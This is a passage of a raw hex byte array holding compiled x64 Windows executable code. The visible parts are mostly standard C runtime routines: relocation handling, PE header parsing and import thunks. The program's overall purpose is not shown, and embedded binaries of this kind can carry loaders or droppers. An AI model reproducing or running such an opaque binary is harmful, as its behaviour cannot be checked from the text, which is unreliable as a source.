E,0xFE,0xFF,0xFF,0x48,0x89,0xDA,0x48,0x8D,0x0D,0xD4,0x2F,0x00,0x00,0xE8,0x2F,0xFE,0xFF,0xFF,0x90,0x66,0x66,0x2E,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0x0F,0x1F,0x00,0x55,0x41,0x57,0x41,0x56,0x41,0x55,0x41,0x54,0x57,0x56,0x53,0x48,0x83,0xEC,0x48,0x48,0x8D,0x6C,0x24,0x40,0x44,0x8B,0x25,0x64,0x7F,0x00,0x00,0x45,0x85,0xE4,0x74,0x17,0x48,0x8D,0x65,0x08,0x5B,0x5E,0x5F,0x41,0x5C,0x41,0x5D,0x41,0x5E,0x41,0x5F,0x5D,0xC3,0x66,0x0F,0x1F,0x44,0x00,0x00,0xC7,0x05,0x3E,0x7F,0x00,0x00,0x01,0x00,0x00,0x00,0xE8,0x69,0x07,0x00,0x00,0x48,0x98,0x48,0x8D,0x04,0x80,0x48,0x8D,0x04,0xC5,0x0F,0x00,0x00,0x00,0x48,0x83,0xE0,0xF0,0xE8,0xB2,0x09,0x00,0x00,0x4C,0x8B,0x2D,0xBB,0x30,0x00,0x00,0x48,0x8B,0x1D,0xC4,0x30,0x00,0x00,0xC7,0x05,0x0E,0x7F,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x29,0xC4,0x48,0x8D,0x44,0x24,0x30,0x48,0x89,0x05,0x03,0x7F,0x00,0x00,0x4C,0x89,0xE8,0x48,0x29,0xD8,0x48,0x83,0xF8,0x07,0x7E,0x90,0x8B,0x13,0x48,0x83,0xF8,0x0B,0x0F,0x8F,0x03,0x01,0x00,0x00,0x8B,0x03,0x85,0xC0,0x0F,0x85,0x69,0x02,0x00,0x00,0x8B,0x43,0x04,0x85,0xC0,0x0F,0x85,0x5E,0x02,0x00,0x00,0x8B,0x53,0x08,0x83,0xFA,0x01,0x0F,0x85,0x92,0x02,0x00,0x00,0x48,0x83,0xC3,0x0C,0x4C,0x39,0xEB,0x0F,0x83,0x56,0xFF,0xFF,0xFF,0x4C,0x8B,0x35,0x7E,0x30,0x00,0x00,0x41,0xBF,0xFF,0xFF,0xFF,0xFF,0xEB,0x65,0x66,0x0F,0x1F,0x44,0x00,0x00,0x83,0xF9,0x08,0x0F,0x84,0xD7,0x00,0x00,0x00,0x83,0xF9,0x10,0x0F,0x85,0x50,0x02,0x00,0x00,0x0F,0xB7,0x37,0x81,0xE2,0xC0,0x00,0x00,0x00,0x66,0x85,0xF6,0x0F,0x89,0xCC,0x01,0x00,0x00,0x48,0x81,0xCE,0x00,0x00,0xFF,0xFF,0x48,0x29,0xC6,0x4C,0x01,0xCE,0x85,0xD2,0x75,0x12,0x48,0x81,0xFE,0x00,0x80,0xFF,0xFF,0x7C,0x65,0x48,0x81,0xFE,0xFF,0xFF,0x00,0x00,0x7F,0x5C,0x48,0x89,0xF9,0xE8,0x61,0xFD,0xFF,0xFF,0x66,0x89,0x37,0x48,0x83,0xC3,0x0C,0x4C,0x39,0xEB,0x0F,0x83,0xD1,0x00,0x00,0x00,0x8B,0x03,0x8B,0x53,0x08,0x8B,0x7B,0x04,0x4C,0x01,0xF0,0x0F,0xB6,0xCA,0x4C,0x8B,0x08,0x4C,0x01,0xF7,0x83,0xF9,0x20,0x0F,0x84,0x0C,0x01,0x00,0x00,0x76,0x82,0x83,0xF9,0x40,0x0F,0x85,0xDB,0x01,0x00,0x00,0x48,0x8B,0x37,0x89,0xD1,0x48,0x29,0xC6,0x4C,0x01,0xCE,0x81,0xE1,0xC0,0x00,0x00,0x00,0x0F,0x85,0x42,0x01,0x00,0x00,0x48,0x85,0xF6,0x78,0xAF,0x48,0x89,0x74,0x24,0x20,0x89,0xCA,0x49,0x89,0xF8,0x48,0x8D,0x0D,0x14,0x2F,0x00,0x00,0xE8,0x87,0xFC,0xFF,0xFF,0x0F,0x1F,0x80,0x00,0x00,0x00,0x00,0x85,0xD2,0x0F,0x85,0x68,0x01,0x00,0x00,0x8B,0x43,0x04,0x89,0xC2,0x0B,0x53,0x08,0x0F,0x85,0xF4,0xFE,0xFF,0xFF,0x48,0x83,0xC3,0x0C,0xE9,0xDE,0xFE,0xFF,0xFF,0x90,0x0F,0xB6,0x37,0x81,0xE2,0xC0,0x00,0x00,0x00,0x40,0x84,0xF6,0x0F,0x89,0x26,0x01,0x00,0x00,0x48,0x81,0xCE,0x00,0xFF,0xFF,0xFF,0x48,0x29,0xC6,0x4C,0x01,0xCE,0x85,0xD2,0x75,0x0F,0x48,0x81,0xFE,0xFF,0x00,0x00,0x00,0x7F,0x97,0x48,0x83,0xFE,0x80,0x7C,0x91,0x48,0x89,0xF9,0x48,0x83,0xC3,0x0C,0xE8,0x92,0xFC,0xFF,0xFF,0x40,0x88,0x37,0x4C,0x39,0xEB,0x0F,0x82,0x35,0xFF,0xFF,0xFF,0x66,0x0F,0x1F,0x44,0x00,0x00,0x8B,0x15,0x6E,0x7D,0x00,0x00,0x85,0xD2,0x0F,0x8E,0x03,0xFE,0xFF,0xFF,0x48,0x8B,0x35,0x53,0x9C,0x00,0x00,0x31,0xDB,0x48,0x8D,0x7D,0xFC,0x0F,0x1F,0x44,0x00,0x00,0x48,0x8B,0x05,0x51,0x7D,0x00,0x00,0x48,0x01,0xD8,0x44,0x8B,0x00,0x45,0x85,0xC0,0x74,0x0D,0x48,0x8B,0x50,0x10,0x48,0x8B,0x48,0x08,0x49,0x89,0xF9,0xFF,0xD6,0x41,0x83,0xC4,0x01,0x48,0x83,0xC3,0x28,0x44,0x3B,0x25,0x26,0x7D,0x00,0x00,0x7C,0xD0,0xE9,0xBC,0xFD,0xFF,0xFF,0x0F,0x1F,0x00,0x8B,0x37,0x81,0xE2,0xC0,0x00,0x00,0x00,0x85,0xF6,0x79,0x74,0x49,0xBB,0x00,0x00,0x00,0x00,0xFF,0xFF,0xFF,0xFF,0x4C,0x09,0xDE,0x48,0x29,0xC6,0x4C,0x01,0xCE,0x85,0xD2,0x75,0x1C,0x4C,0x39,0xFE,0x0F,0x8F,0xEF,0xFE,0xFF,0xFF,0x48,0xB8,0xFF,0xFF,0xFF,0x7F,0xFF,0xFF,0xFF,0xFF,0x48,0x39,0xC6,0x0F,0x8E,0xDC,0xFE,0xFF,0xFF,0x48,0x89,0xF9,0xE8,0xE1,0xFB,0xFF,0xFF,0x89,0x37,0xE9,0x7C,0xFE,0xFF,0xFF,0x66,0x2E,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0x48,0x89,0xF9,0xE8,0xC8,0xFB,0xFF,0xFF,0x48,0x89,0x37,0xE9,0x62,0xFE,0xFF,0xFF,0x48,0x29,0xC6,0x4C,0x01,0xCE,0x85,0xD2,0x0F,0x84,0x37,0xFE,0xFF,0xFF,0xE9,0x44,0xFE,0xFF,0xFF,0x0F,0x1F,0x44,0x00,0x00,0x48,0x29,0xC6,0x4C,0x01,0xCE,0x85,0xD2,0x74,0x99,0xEB,0xB3,0x0F,0x1F,0x40,0x00,0x48,0x29,0xC6,0x4C,0x01,0xCE,0x85,0xD2,0x0F,0x84,0xDD,0xFE,0xFF,0xFF,0xE9,0xE7,0xFE,0xFF,0xFF,0x0F,0x1F,0x44,0x00,0x00,0x4C,0x39,0xEB,0x0F,0x83,0x08,0xFD,0xFF,0xFF,0x4C,0x8B,0x35,0x30,0x2E,0x00,0x00,0x8B,0x73,0x04,0x8B,0x3B,0x48,0x83,0xC3,0x08,0x4C,0x01,0xF6,0x03,0x3E,0x48,0x89,0xF1,0xE8,0x5A,0xFB,0xFF,0xFF,0x89,0x3E,0x4C,0x39,0xEB,0x72,0xE3,0xE9,0xCE,0xFE,0xFF,0xFF,0x89,0xCA,0x48,0x8D,0x0D,0x2D,0x2D,0x00,0x00,0xE8,0xD0,0xFA,0xFF,0xFF,0x48,0x8D,0x0D,0xE9,0x2C,0x00,0x00,0xE8,0xC4,0xFA,0xFF,0xFF,0x90,0x90,0x90,0x90,0x55,0x41,0x55,0x41,0x54,0x57,0x56,0x53,0x48,0x83,0xEC,0x28,0x48,0x8D,0x6C,0x24,0x20,0x4C,0x8D,0x2D,0x48,0x7C,0x00,0x00,0x4C,0x89,0xE9,0xFF,0x15,0xAF,0x9A,0x00,0x00,0x48,0x8B,0x1D,0x18,0x7C,0x00,0x00,0x48,0x85,0xDB,0x74,0x38,0x4C,0x8B,0x25,0xDC,0x9A,0x00,0x00,0x48,0x8B,0x3D,0x9D,0x9A,0x00,0x00,0x0F,0x1F,0x44,0x00,0x00,0x8B,0x0B,0x41,0xFF,0xD4,0x48,0x89,0xC6,0xFF,0xD7,0x48,0x85,0xF6,0x74,0x0D,0x85,0xC0,0x75,0x09,0x48,0x8B,0x43,0x08,0x48,0x89,0xF1,0xFF,0xD0,0x48,0x8B,0x5B,0x10,0x48,0x85,0xDB,0x75,0xDB,0x4C,0x89,0xE9,0x48,0x83,0xC4,0x28,0x5B,0x5E,0x5F,0x41,0x5C,0x41,0x5D,0x5D,0x48,0xFF,0x25,0x85,0x9A,0x00,0x00,0x0F,0x1F,0x44,0x00,0x00,0x55,0x57,0x56,0x53,0x48,0x83,0xEC,0x28,0x48,0x8D,0x6C,0x24,0x20,0x8B,0x05,0xB5,0x7B,0x00,0x00,0x89,0xCF,0x48,0x89,0xD6,0x85,0xC0,0x75,0x14,0x31,0xC0,0x48,0x83,0xC4,0x28,0x5B,0x5E,0x5F,0x5D,0xC3,0x66,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0xBA,0x18,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0xE8,0x51,0x08,0x00,0x00,0x48,0x89,0xC3,0x48,0x85,0xC0,0x74,0x33,0x48,0x89,0x70,0x08,0x48,0x8D,0x35,0x8E,0x7B,0x00,0x00,0x89,0x38,0x48,0x89,0xF1,0xFF,0x15,0xF3,0x99,0x00,0x00,0x48,0x8B,0x05,0x5C,0x7B,0x00,0x00,0x48,0x89,0xF1,0x48,0x89,0x1D,0x52,0x7B,0x00,0x00,0x48,0x89,0x43,0x10,0xFF,0x15,0x08,0x9A,0x00,0x00,0xEB,0xA2,0x83,0xC8,0xFF,0xEB,0x9F,0x90,0x55,0x56,0x53,0x48,0x83,0xEC,0x20,0x48,0x8D,0x6C,0x24,0x20,0x8B,0x05,0x36,0x7B,0x00,0x00,0x89,0xCB,0x85,0xC0,0x75,0x10,0x31,0xC0,0x48,0x83,0xC4,0x20,0x5B,0x5E,0x5D,0xC3,0x66,0x0F,0x1F,0x44,0x00,0x00,0x48,0x8D,0x35,0x31,0x7B,0x00,0x00,0x48,0x89,0xF1,0xFF,0x15,0x98,0x99,0x00,0x00,0x48,0x8B,0x0D,0x01,0x7B,0x00,0x00,0x48,0x85,0xC9,0x74,0x2F,0x31,0xD2,0xEB,0x13,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0x48,0x89,0xCA,0x48,0x85,0xC0,0x74,0x1B,0x48,0x89,0xC1,0x8B,0x01,0x39,0xD8,0x48,0x8B,0x41,0x10,0x75,0xEB,0x48,0x85,0xD2,0x74,0x26,0x48,0x89,0x42,0x10,0xE8,0xA5,0x07,0x00,0x00,0x48,0x89,0xF1,0xFF,0x15,0x84,0x99,0x00,0x00,0x31,0xC0,0x48,0x83,0xC4,0x20,0x5B,0x5E,0x5D,0xC3,0x66,0x2E,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0x48,0x89,0x05,0xA9,0x7A,0x00,0x00,0xEB,0xD5,0x0F,0x1F,0x80,0x00,0x00,0x00,0x00,0x55,0x53,0x48,0x83,0xEC,0x28,0x48,0x8D,0x6C,0x24,0x20,0x83,0xFA,0x02,0x0F,0x84,0xAC,0x00,0x00,0x00,0x77,0x2A,0x85,0xD2,0x74,0x46,0x8B,0x05,0x88,0x7A,0x00,0x00,0x85,0xC0,0x0F,0x84,0xB8,0x00,0x00,0x00,0xC7,0x05,0x76,0x7A,0x00,0x00,0x01,0x00,0x00,0x00,0xB8,0x01,0x00,0x00,0x00,0x48,0x83,0xC4,0x28,0x5B,0x5D,0xC3,0x66,0x90,0x83,0xFA,0x03,0x75,0xED,0x8B,0x05,0x5D,0x7A,0x00,0x00,0x85,0xC0,0x74,0xE3,0xE8,0x0C,0xFE,0xFF,0xFF,0xEB,0xDC,0x66,0x2E,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0x8B,0x05,0x42,0x7A,0x00,0x00,0x85,0xC0,0x75,0x6E,0x8B,0x05,0x38,0x7A,0x00,0x00,0x83,0xF8,0x01,0x75,0xBD,0x48,0x8B,0x1D,0x24,0x7A,0x00,0x00,0x48,0x85,0xDB,0x74,0x18,0x0F,0x1F,0x80,0x00,0x00,0x00,0x00,0x48,0x89,0xD9,0x48,0x8B,0x5B,0x10,0xE8,0xE4,0x06,0x00,0x00,0x48,0x85,0xDB,0x75,0xEF,0x48,0x8D,0x0D,0x20,0x7A,0x00,0x00,0x48,0xC7,0x05,0xF5,0x79,0x00,0x00,0x00,0x00,0x00,0x00,0xC7,0x05,0xF3,0x79,0x00,0x00,0x00,0x00,0x00,0x00,0xFF,0x15,0x6D,0x98,0x00,0x00,0xE9,0x72,0xFF,0xFF,0xFF,0xE8,0x3B,0x04,0x00,0x00,0xB8,0x01,0x00,0x00,0x00,0x48,0x83,0xC4,0x28,0x5B,0x5D,0xC3,0x0F,0x1F,0x80,0x00,0x00,0x00,0x00,0xE8,0x83,0xFD,0xFF,0xFF,0xEB,0x8B,0x90,0x48,0x8D,0x0D,0xD9,0x79,0x00,0x00,0xFF,0x15,0x6B,0x98,0x00,0x00,0xE9,0x36,0xFF,0xFF,0xFF,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x31,0xC0,0x66,0x81,0x39,0x4D,0x5A,0x75,0x0F,0x48,0x63,0x51,0x3C,0x48,0x01,0xD1,0x81,0x39,0x50,0x45,0x00,0x00,0x74,0x08,0xC3,0x0F,0x1F,0x80,0x00,0x00,0x00,0x00,0x31,0xC0,0x66,0x81,0x79,0x18,0x0B,0x02,0x0F,0x94,0xC0,0xC3,0x0F,0x1F,0x40,0x00,0x48,0x63,0x41,0x3C,0x48,0x01,0xC1,0x0F,0xB7,0x41,0x14,0x44,0x0F,0xB7,0x41,0x06,0x48,0x8D,0x44,0x01,0x18,0x66,0x45,0x85,0xC0,0x74,0x32,0x41,0x8D,0x48,0xFF,0x48,0x8D,0x0C,0x89,0x4C,0x8D,0x4C,0xC8,0x28,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0x44,0x8B,0x40,0x0C,0x4C,0x89,0xC1,0x4C,0x39,0xC2,0x72,0x08,0x03,0x48,0x08,0x48,0x39,0xCA,0x72,0x0B,0x48,0x83,0xC0,0x28,0x4C,0x39,0xC8,0x75,0xE3,0x31,0xC0,0xC3,0x55,0x57,0x56,0x53,0x48,0x83,0xEC,0x28,0x48,0x8D,0x6C,0x24,0x20,0x48,0x89,0xCE,0xE8,0x2B,0x06,0x00,0x00,0x48,0x83,0xF8,0x08,0x77,0x7D,0x48,0x8B,0x15,0xAE,0x2A,0x00,0x00,0x31,0xDB,0x66,0x81,0x3A,0x4D,0x5A,0x75,0x5B,0x48,0x63,0x42,0x3C,0x48,0x01,0xD0,0x81,0x38,0x50,0x45,0x00,0x00,0x75,0x4C,0x66,0x81,0x78,0x18,0x0B,0x02,0x75,0x44,0x0F,0xB7,0x50,0x14,0x48,0x8D,0x5C,0x10,0x18,0x0F,0xB7,0x50,0x06,0x66,0x85,0xD2,0x74,0x44,0x8D,0x42,0xFF,0x48,0x8D,0x04,0x80,0x48,0x8D,0x7C,0xC3,0x28,0xEB,0x0F,0x66,0x0F,0x1F,0x44,0x00,0x00,0x48,0x83,0xC3,0x28,0x48,0x39,0xFB,0x74,0x27,0x41,0xB8,0x08,0x00,0x00,0x00,0x48,0x89,0xF2,0x48,0x89,0xD9,0xE8,0xC6,0x05,0x00,0x00,0x85,0xC0,0x75,0xE2,0x48,0x89,0xD8,0x48,0x83,0xC4,0x28,0x5B,0x5E,0x5F,0x5D,0xC3,0x66,0x0F,0x1F,0x44,0x00,0x00,0x31,0xDB,0x48,0x89,0xD8,0x48,0x83,0xC4,0x28,0x5B,0x5E,0x5F,0x5D,0xC3,0x66,0x2E,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0x48,0x8B,0x15,0x19,0x2A,0x00,0x00,0x31,0xC0,0x66,0x81,0x3A,0x4D,0x5A,0x75,0x10,0x4C,0x63,0x42,0x3C,0x49,0x01,0xD0,0x41,0x81,0x38,0x50,0x45,0x00,0x00,0x74,0x08,0xC3,0x0F,0x1F,0x80,0x00,0x00,0x00,0x00,0x66,0x41,0x81,0x78,0x18,0x0B,0x02,0x75,0xEF,0x41,0x0F,0xB7,0x40,0x14,0x48,0x29,0xD1,0x49,0x8D,0x44,0x00,0x18,0x45,0x0F,0xB7,0x40,0x06,0x66,0x45,0x85,0xC0,0x74,0x34,0x41,0x8D,0x50,0xFF,0x48,0x8D,0x14,0x92,0x4C,0x8D,0x4C,0xD0,0x28,0x66,0x2E,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0x44,0x8B,0x40,0x0C,0x4C,0x89,0xC2,0x4C,0x39,0xC1,0x72,0x08,0x03,0x50,0x08,0x48,0x39,0xD1,0x72,0xAC,0x48,0x83,0xC0,0x28,0x4C,0x39,0xC8,0x75,0xE3,0x31,0xC0,0xC3,0x48,0x8B,0x05,0x99,0x29,0x00,0x00,0x31,0xC9,0x66,0x81,0x38,0x4D,0x5A,0x75,0x0F,0x48,0x63,0x50,0x3C,0x48,0x01,0xD0,0x81,0x38,0x50,0x45,0x00,0x00,0x74,0x09,0x89,0xC8,0xC3,0x66,0x0F,0x1F,0x44,0x00,0x00,0x66,0x81,0x78,0x18,0x0B,0x02,0x75,0xEF,0x0F,0xB7,0x48,0x06,0x89,0xC8,0xC3,0x66,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0x4C,0x8B,0x05,0x59,0x29,0x00,0x00,0x31,0xC0,0x66,0x41,0x81,0x38,0x4D,0x5A,0x75,0x0F,0x49,0x63,0x50,0x3C,0x4C,0x01,0xC2,0x81,0x3A,0x50,0x45,0x00,0x00,0x74,0x08,0xC3,0x0F,0x1F,0x80,0x00,0x00,0x00,0x00,0x66,0x81,0x7A,0x18,0x0B,0x02,0x75,0xF0,0x0F,0xB7,0x42,0x14,0x44,0x0F,0xB7,0x42,0x06,0x48,0x8D,0x44,0x02,0x18,0x66,0x45,0x85,0xC0,0x74,0x2C,0x41,0x8D,0x50,0xFF,0x48,0x8D,0x14,0x92,0x48,0x8D,0x54,0xD0,0x28,0x0F,0x1F,0x80,0x00,0x00,0x00,0x00,0xF6,0x40,0x27,0x20,0x74,0x09,0x48,0x85,0xC9,0x74,0xBD,0x48,0x83,0xE9,0x01,0x48,0x83,0xC0,0x28,0x48,0x39,0xC2,0x75,0xE8,0x31,0xC0,0xC3,0x66,0x66,0x2E,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0x66,0x90,0x48,0x8B,0x05,0xD9,0x28,0x00,0x00,0x31,0xD2,0x66,0x81,0x38,0x4D,0x5A,0x75,0x0F,0x48,0x63,0x48,0x3C,0x48,0x01,0xC1,0x81,0x39,0x50,0x45,0x00,0x00,0x74,0x09,0x48,0x89,0xD0,0xC3,0x0F,0x1F,0x44,0x00,0x00,0x66,0x81,0x79,0x18,0x0B,0x02,0x48,0x0F,0x44,0xD0,0x48,0x89,0xD0,0xC3,0x66,0x2E,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0x48,0x8B,0x15,0x99,0x28,0x00,0x00,0x31,0xC0,0x66,0x81,0x3A,0x4D,0x5A,0x75,0x10,0x4C,0x63,0x42,0x3C,0x49,0x01,0xD0,0x41,0x81,0x38,0x50,0x45,0x00,0x00,0x74,0x08,0xC3,0x0F,0x1F,0x80,0x00,0x00,0x00,0x00,0x66,0x41,0x81,0x78,0x18,0x0B,0x02,0x75,0xEF,0x48,0x29,0xD1,0x45,0x0F,0xB7,0x48,0x06,0x41,0x0F,0xB7,0x50,0x14,0x49,0x8D,0x54,0x10,0x18,0x66,0x45,0x85,0xC9,0x74,0xD7,0x41,0x8D,0x41,0xFF,0x48,0x8D,0x04,0x80,0x4C,0x8D,0x4C,0xC2,0x28,0x66,0x2E,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0x44,0x8B,0x42,0x0C,0x4C,0x89,0xC0,0x4C,0x39,0xC1,0x72,0x08,0x03,0x42,0x08,0x48,0x39,0xC1,0x72,0x0C,0x48,0x83,0xC2,0x28,0x4C,0x39,0xCA,0x75,0xE3,0x31,0xC0,0xC3,0x8B,0x42,0x24,0xF7,0xD0,0xC1,0xE8,0x1F,0xC3,0x0F,0x1F,0x80,0x00,0x00,0x00,0x00,0x4C,0x8B,0x1D,0x09,0x28,0x00,0x00,0x45,0x31,0xC0,0x66,0x41,0x81,0x3B,0x4D,0x5A,0x41,0x89,0xCA,0x75,0x0F,0x49,0x63,0x4B,0x3C,0x4C,0x01,0xD9,0x81,0x39,0x50,0x45,0x00,0x00,0x74,0x0C,0x4C,0x89,0xC0,0xC3,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0x66,0x81,0x79,0x18,0x0B,0x02,0x75,0xEC,0x8B,0x81,0x90,0x00,0x00,0x00,0x85,0xC0,0x74,0xE2,0x0F,0xB7,0x51,0x14,0x44,0x0F,0xB7,0x49,0x06,0x48,0x8D,0x54,0x11,0x18,0x66,0x45,0x85,0xC9,0x74,0xCE,0x41,0x8D,0x49,0xFF,0x48,0x8D,0x0C,0x89,0x4C,0x8D,0x4C,0xCA,0x28,0x0F,0x1F,0x44,0x00,0x00,0x44,0x8B,0x42,0x0C,0x4C,0x89,0xC1,0x4C,0x39,0xC0,0x72,0x08,0x03,0x4A,0x08,0x48,0x39,0xC8,0x72,0x14,0x48,0x83,0xC2,0x28,0x49,0x39,0xD1,0x75,0xE3,0x45,0x31,0xC0,0x4C,0x89,0xC0,0xC3,0x0F,0x1F,0x40,0x00,0x4C,0x01,0xD8,0xEB,0x0B,0x0F,0x1F,0x00,0x41,0x83,0xEA,0x01,0x48,0x83,0xC0,0x14,0x8B,0x48,0x04,0x85,0xC9,0x75,0x07,0x8B,0x50,0x0C,0x85,0xD2,0x74,0xD7,0x45,0x85,0xD2,0x7F,0xE5,0x44,0x8B,0x40,0x0C,0x4D,0x01,0xD8,0x4C,0x89,0xC0,0xC3,0x90,0x90,0xDB,0xE3,0xC3,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x51,0x50,0x48,0x3D,0x00,0x10,0x00,0x00,0x48,0x8D,0x4C,0x24,0x18,0x72,0x19,0x48,0x81,0xE9,0x00,0x10,0x00,0x00,0x48,0x83,0x09,0x00,0x48,0x2D,0x00,0x10,0x00,0x00,0x48,0x3D,0x00,0x10,0x00,0x00,0x77,0xE7,0x48,0x29,0xC1,0x48,0x83,0x09,0x00,0x58,0x59,0xC3,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0xB8,0x01,0x00,0x00,0x00,0xC3,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x45,0x31,0xC0,0x48,0x89,0xD0,0x48,0x85,0xD2,0x75,0x0E,0xEB,0x17,0x0F,0x1F,0x00,0x49,0x83,0xC0,0x01,0x4C,0x39,0xC0,0x74,0x0B,0x66,0x42,0x83,0x3C,0x41,0x00,0x75,0xEF,0x4C,0x89,0xC0,0xC3,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x55,0x53,0x48,0x83,0xEC,0x28,0x48,0x8D,0x6C,0x24,0x20,0x89,0xCB,0xE8,0x8E,0x01,0x00,0x00,0x89,0xD9,0x48,0x8D,0x14,0x49,0x48,0xC1,0xE2,0x04,0x48,0x01,0xD0,0x48,0x83,0xC4,0x28,0x5B,0x5D,0xC3,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x48,0x85,0xC9,0x74,0x12,0x66,0x0F,0xEF,0xC0,0x31,0xC0,0x48,0xC7,0x41,0x10,0x00,0x00,0x00,0x00,0x0F,0x11,0x01,0xC3,0xB8,0xFF,0xFF,0xFF,0xFF,0xC3,0x0F,0x1F,0x00,0x55,0x41,0x54,0x57,0x56,0x53,0x48,0x83,0xEC,0x20,0x48,0x8D,0x6C,0x24,0x20,0x48,0x89,0xCB,0x48,0x89,0xD7,0x48,0x85,0xC9,0x0F,0x84,0xB2,0x00,0x00,0x00,0xB9,0x08,0x00,0x00,0x00,0xE8,0x40,0x01,0x00,0x00,0x48,0x83,0x3B,0x00,0x74,0x6A,0x48,0x8B,0x53,0x08,0x48,0x8B,0x43,0x10,0x48,0x39,0xC2,0x74,0x25,0x48,0x8D,0x42,0x08,0xB9,0x08,0x00,0x00,0x00,0x48,0x89,0x43,0x08,0x48,0x89,0x3A,0xE8,0x28,0x01,0x00,0x00,0x31,0xC0,0x48,0x83,0xC4,0x20,0x5B,0x5E,0x5F,0x41,0x5C,0x5D,0xC3,0x0F,0x1F,0x00,0x48,0x8B,0x0B,0x48,0x89,0xD6,0x48,0x29,0xCE,0x49,0x89,0xF4,0x49,0xC1,0xFC,0x03,0x49,0xC1,0xE4,0x04,0x4C,0x89,0xE2,0xE8,0x54,0x01,0x00,0x00,0x48,0x85,0xC0,0x74,0x45,0x48,0x89,0x03,0x48,0x8D,0x14,0x30,0x4C,0x01,0xE0,0x48,0x89,0x43,0x10,0xEB,0xAA,0x0F,0x1F,0x80,0x00,0x00,0x00,0x00,0xBA,0x08,0x00,0x00,0x00,0xB9,0x20,0x00,0x00,0x00,0xE8,0xE9,0x00,0x00,0x00,0x48,0x89,0x03,0x48,0x89,0xC2,0x48,0x85,0xC0,0x74,0x14,0x48,0x89,0x43,0x08,0x48,0x8D,0x80,0x00,0x01,0x00,0x00,0x48,0x89,0x43,0x10,0xE9,0x70,0xFF,0xFF,0xFF,0xB9,0x08,0x00,0x00,0x00,0xE8,0xA8,0x00,0x00,0x00,0x83,0xC8,0xFF,0xE9,0x7A,0xFF,0xFF,0xFF,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0x55,0x57,0x56,0x53,0x48,0x83,0xEC,0x28,0x48,0x8D,0x6C,0x24,0x20,0x48,0x89,0xCF,0xB9,0x08,0x00,0x00,0x00,0xE8,0x6E,0x00,0x00,0x00,0x48,0x8B,0x37,0x66,0x0F,0xEF,0xC0,0x48,0x8B,0x5F,0x08,0x48,0xC7,0x47,0x10,0x00,0x00,0x00,0x00,0xB9,0x08,0x00,0x00,0x00,0x0F,0x11,0x07,0xE8,0x5E,0x00,0x00,0x00,0x48,0x85,0xF6,0x74,0x24,0x48,0x83,0xEB,0x08,0x48,0x39,0xF3,0x72,0x13,0x48,0x8B,0x03,0x48,0x85,0xC0,0x74,0xEF,0xFF,0xD0,0x48,0x83,0xEB,0x08,0x48,0x39,0xF3,0x73,0xED,0x48,0x89,0xF1,0xE8,0x55,0x00,0x00,0x00,0x31,0xC0,0x48,0x83,0xC4,0x28,0x5B,0x5E,0x5F,0x5D,0xC3,0x90,0x90,0xFF,0x25,0x5A,0x92,0x00,0x00,0x90,0x90,0xFF,0x25,0x5A,0x92,0x00,0x00,0x90,0x90,0xFF,0x25,0x5A,0x92,0x00,0x00,0x90,0x90,0xFF,0x25,0x5A,0x92,0x00,0x00,0x90,0x90,0xFF,0x25,0x5A,0x92,0x00,0x00,0x90,0x90,0xFF,0x25,0x5A,0x92,0x00,0x00,0x90,0x90,0xFF,0x25,0x5A,0x92,0x00,0x00,0x90,0x90,0xFF,0x25,0x5A,0x92,0x00,0x00,0x90,0x90,0xFF,0x25,0x5A,0x92,0x00,0x00,0x90,0x90,0xFF,0x25,0x5A,0x92,0x00,0x00,0x90,0x90,0xFF,0x25,0x5A,0x92,0x00,0x00,0x90,0x90,0xFF,0x25,0x5A,0x92,0x00,0x00,0x90,0x90,0xFF,0x25,0x5A,0x92,0x00,0x00,0x90,0x90,0xFF,0x25,0x5A,0x92,0x00,0x00,0x90,0x90,0xFF,0x25,0x5A,0x92,0x00,0x00,0x90,0x90,0xFF,0x25,0x5A,0x92,0x00,0x00,0x90,0x90,0xFF,0x25,0x5A,0x92,0x00,0x00,0x90,0x90,0xFF,0x25,0x5A,0x92,0x00,0x00,0x90,0x90,0xFF,0x25,0x5A,0x92,0x00,0x00,0x90,0x90,0xFF,0x25,0x5A,0x92,0x00,0x00,0x90,0x90,0xFF,0x25,0x5A,0x92,0x00,0x00,0x90,0x90,0xFF,0x25,0x5A,0x92,0x00,0x00,0x90,0x90,0xFF,0x25,0x5A,0x92,0x00,0x00,0x90,0x90,0xFF,0x25,0x5A,0x92,0x00,0x00,0x90,0x90,0xFF,0x25,0x5A,0x92,0x00,0x00,0x90,0x90,0xFF,0x25,0x5A,0x92,0x00,0x00,0x90,0x90,0xFF,0x25,0x5A,0x92,0x00,0x00,0x90,0x90,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0xFF,0x25,0x6A,0x91,0x00,0x00,0x90,0x90,0xFF,0x25,0x5A,0x91,0x00,0x00,0x90,0x90,0xFF,0x25,0x4A,0x91,0x00,0x00,0x90,0x90,0xFF,0x25,0x3A,0x91,0x00,0x00,0x90,0x90,0xFF,0x25,0x2A,0x91,0x00,0x00,0x90,0x90,0xFF,0x25,0x1A,0x91,0x00,0x00,0x90,0x90,0xFF,0x25,0